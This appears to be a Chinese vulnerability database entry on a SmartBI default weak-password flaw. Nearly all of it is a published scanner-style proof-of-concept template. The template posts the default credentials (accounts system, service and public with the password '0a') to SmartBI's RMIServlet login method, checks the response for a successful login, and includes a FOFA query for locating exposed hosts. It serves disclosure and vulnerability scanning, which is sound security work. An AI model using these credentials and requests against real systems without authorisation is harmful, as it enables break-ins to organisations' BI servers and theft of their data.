smartbi-default-login: SmartBI - Default Login

日期: 2025-08-01 | 影响软件: SmartBI | POC: 已公开

漏洞描述

Smartbi Default User Weak Password were discovered.

PoC代码[已公开]

id: smartbi-default-login

info:
  name: SmartBI - Default Login
  author: SleepingBag945
  severity: high
  description: |
    Smartbi Default User Weak Password were discovered.
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491565&idx=1&sn=eb2af62a72167c6f82ae8ec3db878511
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-default-user-weakpass.yaml
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="SMARTBI"
  tags: smartbi,default-login,vuln

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        className=UserService&methodName=loginFromDB&params=["{{role}}","0a"]

    payloads:
      path:
        - /smartbi/vision/RMIServlet
        - /vision/RMIServlet

      role:
        - system
        - service
        - public
    attack: pitchfork
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":true'
          - '"retCode":0'
        condition: and

      - type: word
        part: header
        words:
          - 'text/plain'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bee034602d7650406a9299155282f51ab9f70ee9ce5d173bd5bc69fca1214ad9022010c66e9485432d52a8b47cf25e125b44d24dc215b413ecad5971059459a17e09:922c64590222798bb761d5b6d8e72950

相关漏洞推荐